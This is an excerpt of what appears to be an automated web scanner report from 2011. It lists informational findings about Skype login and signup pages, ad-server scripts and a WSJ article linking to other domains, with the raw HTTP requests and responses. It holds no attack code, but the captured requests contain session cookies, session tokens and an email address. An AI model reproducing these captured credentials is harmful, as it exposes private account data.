<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-us" xml:lang="en
...[SNIP]...
<!-- BEGIN METRICS-->
<script type="text/javascript" language="JavaScript" src="https://secure.hp-ww.com/country/us/en/js/metricsNAhhomktg.js"></script>
...[SNIP]...

17.50. https://login.skype.com/account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /account/?setlang=[LC] HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:06 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>

<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/buttons.css" type="text/css" media="screen, print"/>
<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/navigation.css" type="text/css" media="screen"/>
<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/grid.css" type="text/css" media="screen"/>

</head>
...[SNIP]...

17.51. https://login.skype.com/account/login-form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/login-form

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session=l5p5g0er47bh75g44j3p4n46h7

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:19:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:19:11 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 47339
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<!-- Icon -->
<link rel="icon" type="image/vnd.microsoft.icon" href="https://apps.skypeassets.com/static/skype.login/images/icons/favicon.ico?_version=1.11"/>
<link rel="shortcut icon" href="https://apps.skypeassets.com/static/skype.login/images/icons/favicon.ico?_version=1.11"/>
<link rel="apple-touch-icon" href="https://apps.skypeassets.com/static/skype.login/images/logos/skype_webclip.png?_version=1.11"/>

<!-- Default stylesheets -->
<link rel="stylesheet" type="text/css" media="print" href="https://apps.skypeassets.com/static/skype.login/css/print.css?_version=1.11"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://apps.skypeassets.com/static/skype.login/css/complete.css?_version=1.11"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://apps.skypeassets.com/static/skype.login/css/wbr-complete.css?_version=1.11"/>

<!-- Right to left languages -->


<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/buttons.css" type="text/css" media="screen, print"/>
<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/navigation.css" type="text/css" media="screen"/>
<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/grid.css" type="text/css" media="screen"/>

<script type="text/javascript">
...[SNIP]...
</script>


<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/ab/mbox.js" charset="utf-8"></script>
...[SNIP]...
</span>
<img alt="" id="bs" class="fix shadow" src="https://apps.skypeassets.com/static/skype.login/images/tabs/shadow.png?_version=1.11"/>
</div>
...[SNIP]...
</script>
<script type="text/javascript" src="https://mpsnare.iesnare.com/snare.js"></script>
...[SNIP]...
</script>


<script src="https://secure.skypeassets.com/i/js/wanalytics/wanalytics-secure.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

17.52. https://login.skype.com/account/password-automation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/password-automation

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /account/password-automation?setlang=[LC] HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:47:58 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 42621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="lt
...[SNIP]...
<!-- Icon -->
<link rel="icon" type="image/vnd.microsoft.icon" href="https://apps.skypeassets.com/static/skype.login/images/icons/favicon.ico?_version=1.11"/>
<link rel="shortcut icon" href="https://apps.skypeassets.com/static/skype.login/images/icons/favicon.ico?_version=1.11"/>
<link rel="apple-touch-icon" href="https://apps.skypeassets.com/static/skype.login/images/logos/skype_webclip.png?_version=1.11"/>

<!-- Default stylesheets -->
<link rel="stylesheet" type="text/css" media="print" href="https://apps.skypeassets.com/static/skype.login/css/print.css?_version=1.11"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://apps.skypeassets.com/static/skype.login/css/complete.css?_version=1.11"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://apps.skypeassets.com/static/skype.login/css/pwa-complete.css?_version=1.11"/>

<!-- Right to left languages -->


<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/buttons.css" type="text/css" media="screen, print"/>
<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/navigation.css" type="text/css" media="screen"/>
<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/grid.css" type="text/css" media="screen"/>

<script type="text/javascript">
...[SNIP]...
</script>


<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://secure.skypeassets.com/i/js/ab/mbox.js" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="https://secure.skypeassets.com/i/js/wanalytics/wanalytics-secure.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

17.53. https://login.skype.com/account/password-reset-request  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/password-reset-request

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3
Host: login.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 17:59:28 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 42065
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<!-- Icon -->
<link rel="icon" type="image/vnd.microsoft.icon" href="https://apps.skypeassets.com/static/skype.login/images/icons/favicon.ico?_version=1.11"/>
<link rel="shortcut icon" href="https://apps.skypeassets.com/static/skype.login/images/icons/favicon.ico?_version=1.11"/>
<link rel="apple-touch-icon" href="https://apps.skypeassets.com/static/skype.login/images/logos/skype_webclip.png?_version=1.11"/>

<!-- Default stylesheets -->
<link rel="stylesheet" type="text/css" media="print" href="https://apps.skypeassets.com/static/skype.login/css/print.css?_version=1.11"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://apps.skypeassets.com/static/skype.login/css/complete.css?_version=1.11"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://apps.skypeassets.com/static/skype.login/css/wbr-complete.css?_version=1.11"/>

<!-- Right to left languages -->


<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/buttons.css" type="text/css" media="screen, print"/>
<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/navigation.css" type="text/css" media="screen"/>
<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/grid.css" type="text/css" media="screen"/>

<script type="text/javascript">
...[SNIP]...
</script>


<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/ab/mbox.js" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="https://secure.skypeassets.com/i/js/wanalytics/wanalytics-secure.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

17.54. https://login.skype.com/account/password-token-sent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/password-token-sent

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /account/password-token-sent?mode=&email=h02332%40gmail.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 20:59:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 20:59:41 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 41059
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<!-- Icon -->
<link rel="icon" type="image/vnd.microsoft.icon" href="https://apps.skypeassets.com/static/skype.login/images/icons/favicon.ico?_version=1.11"/>
<link rel="shortcut icon" href="https://apps.skypeassets.com/static/skype.login/images/icons/favicon.ico?_version=1.11"/>
<link rel="apple-touch-icon" href="https://apps.skypeassets.com/static/skype.login/images/logos/skype_webclip.png?_version=1.11"/>

<!-- Default stylesheets -->
<link rel="stylesheet" type="text/css" media="print" href="https://apps.skypeassets.com/static/skype.login/css/print.css?_version=1.11"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://apps.skypeassets.com/static/skype.login/css/complete.css?_version=1.11"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://apps.skypeassets.com/static/skype.login/css/wbr-complete.css?_version=1.11"/>

<!-- Right to left languages -->


<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/buttons.css" type="text/css" media="screen, print"/>
<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/navigation.css" type="text/css" media="screen"/>
<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/grid.css" type="text/css" media="screen"/>

<script type="text/javascript">
...[SNIP]...
</script>


<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/ab/mbox.js" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="https://secure.skypeassets.com/i/js/wanalytics/wanalytics-secure.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

17.55. https://login.skype.com/account/signup-form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/signup-form

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3
Host: login.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 17:59:54 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 119699
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<!-- Icon -->
<link rel="icon" type="image/vnd.microsoft.icon" href="https://apps.skypeassets.com/static/skype.login/images/icons/favicon.ico?_version=1.11"/>
<link rel="shortcut icon" href="https://apps.skypeassets.com/static/skype.login/images/icons/favicon.ico?_version=1.11"/>
<link rel="apple-touch-icon" href="https://apps.skypeassets.com/static/skype.login/images/logos/skype_webclip.png?_version=1.11"/>

<!-- Default stylesheets -->
<link rel="stylesheet" type="text/css" media="print" href="https://apps.skypeassets.com/static/skype.login/css/print.css?_version=1.11"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://apps.skypeassets.com/static/skype.login/css/complete.css?_version=1.11"/>
<link rel="stylesheet" type="text/css" media="screen" href="https://apps.skypeassets.com/static/skype.login/css/wbr-complete.css?_version=1.11"/>

<!-- Right to left languages -->


<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/buttons.css" type="text/css" media="screen, print"/>
<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/navigation.css" type="text/css" media="screen"/>
<link rel="stylesheet" href="https://secure.skypeassets.com/i/css/turbo/grid.css" type="text/css" media="screen"/>

<script type="text/javascript">
...[SNIP]...
</script>


<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/ab/mbox.js" charset="utf-8"></script>
...[SNIP]...
</span>
<img alt="" id="bs" class="fix shadow" src="https://apps.skypeassets.com/static/skype.login/images/tabs/shadow.png?_version=1.11"/>
</div>
...[SNIP]...
</div>

<script src="https://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</label>

<img class="flag hidden" id="mobileFlag" alt="" src="https://apps.skypeassets.com/static/skype.login/images/flags/dummyflag.png?_version=1.11"/>
<select name="areacode" id="mobileAreaCode" class="noMessageWhenEmpty Skypelogin_Wbr_Mobile">
...[SNIP]...
<a href="javascript:Recaptcha.reload()"><img src="https://apps.skypeassets.com/static/skype.login/images/icons/dummy_icon.png?_version=1.11" alt="" class="captchaImg refresh"/>Refresh</a>
...[SNIP]...
<a href="javascript:Recaptcha.switch_type('audio')" class="recaptcha_audio_cant_hear_link"><img src="https://apps.skypeassets.com/static/skype.login/images/icons/dummy_icon.png?_version=1.11" alt="Listen" class="captchaImg listen"/>Listen</a>
...[SNIP]...
<a href="javascript:Recaptcha.switch_type('image')" class="recaptcha_audio_cant_hear_link"><img src="https://apps.skypeassets.com/static/skype.login/images/icons/dummy_icon.png?_version=1.11" alt="Read" class="captchaImg read"/>Read</a>
...[SNIP]...
<a href="javascript:Recaptcha.showhelp()"><img src="https://apps.skypeassets.com/static/skype.login/images/icons/dummy_icon.png?_version=1.11" alt="Help" class="captchaImg help"/>Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.google.com/recaptcha/api/challenge?k=6Lc9KQwAAAAAAK2Egvu8-_F_tR161wkdIlRslemS"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://mpsnare.iesnare.com/snare.js"></script>
...[SNIP]...
<noscript>
<iframe src="https://fls.doubleclick.net/activityi;src=2609787;type=skype282;cat=webre621;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>


<script src="https://secure.skypeassets.com/i/js/wanalytics/wanalytics-secure.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

17.56. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/wallstreetoasis.com/ROS/1188128263@Right  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/wallstreetoasis.com/ROS/1188128263@Right

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/wallstreetoasis.com/ROS/1188128263@Right?_RM_HTML_CLICK_=http://msite.martiniadnetwork.com/action/track/type/0/pid/1811702/sid/7696162854db74d954e7c2/loc/http%3A%2F%2Fwww.wallstreetoasis.com%2Fforums%2Fhoulihan-lokey-exit-opps/pubclick/&XE&muid=21051315103139790868608&&tax23_RefDocLoc=http://www.google.com/search&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: oasc12.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2500
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N5371.149925.MARTINIMEDIANETWORK/B5703799.12;sz=160x600;click0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/wallstreetoasis.com/ROS/L23/1747216000/Right/Martini/hertz_goldplusrewar_080111_387/hertz_bt_160x600.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1811702/sid/7696162854db74d954e7c2/loc/http%3A//www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps/pubclick//Martini/hertz_goldplusrewar_080111_387/pos/Right/page/wallstreetoasis.com/ROS/L23/ord/1747216000?;ord=1747216000?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N5371.149925.MARTINIMEDIANETWORK/B5703799.12;abr=!ie;sz=160x600;click0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/wallstreetoasis.com/ROS/L23/1747216000/Right/Martini/hertz_goldplusrewar_080111_387/hertz_bt_160x600.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1811702/sid/7696162854db74d954e7c2/loc/http%3A//www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps/pubclick//Martini/hertz_goldplusrewar_080111_387/pos/Right/page/wallstreetoasis.com/ROS/L23/ord/1747216000?;ord=1747216000?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
s/Right/page/wallstreetoasis.com/ROS/L23/ord/1747216000?http://ad.doubleclick.net/jump/N5371.149925.MARTINIMEDIANETWORK/B5703799.12;abr=!ie4;abr=!ie5;sz=160x600;ord=1747216000?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N5371.149925.MARTINIMEDIANETWORK/B5703799.12;abr=!ie4;abr=!ie5;sz=160x600;ord=1747216000?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

17.57. http://oasc18015.247realmedia.com/RealMedia/ads/adstream_jx.ads/www.wallstreetoasis.rgm/paid/1586444613@Right  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc18015.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/www.wallstreetoasis.rgm/paid/1586444613@Right

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/www.wallstreetoasis.rgm/paid/1586444613@Right?_RM_HTML_CLICK_=& HTTP/1.1
Host: oasc18015.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2; NSC_d18efm_qppm_iuuq=ffffffff09499e6845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2027
Content-Type: application/x-javascript

document.write ('<iframe src="http://view.atdmt.com/I36/iview/325171692/direct;wi.300;hi.250/01/1897815158?click=http://oasc18015.247realmedia.com/RealMedia/ads/click_lx.ads/www.wallstreetoasis.rgm/paid/L28/1897815158/Right/RGM/RGM-2618_CapitalOne_300x250_GeoKansas_0828-0917/RGM-2618_CapitalOne_300x250_GeoKansas_0717-0806_070911.html/4d686437616b356934616b41434d6658?" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">\n');
document.write ('<script language="JavaScript" type="text/javascript">
...[SNIP]...
oKansas_0828-0917/RGM-2618_CapitalOne_300x250_GeoKansas_0717-0806_070911.html/4d686437616b356934616b41434d6658?http://clk.atdmt.com/I36/go/325171692/direct;wi.300;hi.250/01/1897815158" target="_blank"><img border="0" src="http://view.atdmt.com/I36/view/325171692/direct;wi.300;hi.250/01/1897815158" /></a>
...[SNIP]...

17.58. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424053111904900904576549933849920392.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:18 GMT
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep05 - Sun 09/04/11 - 09:07:13 EDT
Cache-Control: max-age=15
Expires: Sun, 04 Sep 2011 16:17:33 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 191170
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2486"></script>
...[SNIP]...
<li class="hat_tab" id="hat_tab_mw">
                       <a class="hat_site_title" href="http://www.marketwatch.com">MarketWatch</a>
...[SNIP]...
<li><a class="hat_site_link" href="http://www.marketwatch.com">MarketWatch</a>
...[SNIP]...
<li class="hat_tab" id="hat_tab_bol">
                       <a class="hat_site_title" href="http://online.barrons.com/home">Barron's</a>
...[SNIP]...
<li><a class="hat_site_link" href="http://online.barrons.com/home">Barron's</a>
...[SNIP]...
<li class="hat_tab" id="hat_tab_sm">
                       <a class="hat_site_title" href="http://www.smartmoney.com">SmartMoney</a>
...[SNIP]...
<li><a class="hat_site_link" href="http://www.smartmoney.com">SmartMoney</a>
...[SNIP]...
<li class="hat_tab" id="hat_tab_atd">
                       <a class="hat_site_title" href="http://allthingsd.com">AllThingsDigital</a>
...[SNIP]...
<li><a class="hat_site_link" href="http://allthingsd.com">AllThingsDigital</a>
...[SNIP]...
<li class="hat_tab" id="hat_tab_fins">
                       <a class="hat_site_title" href="http://www.fins.com">FINS</a>
...[SNIP]...
<li><a class="hat_site_link" href="http://www.fins.com">FINS</a>
...[SNIP]...
<li class="hat_dd_item">
                       <a href="http://bigcharts.marketwatch.com/">BigCharts</a>
...[SNIP]...
<li class="hat_dd_item">
                       <a href="http://vse.marketwatch.com/Game/Homepage.aspx">Virtual Stock Exchange</a>
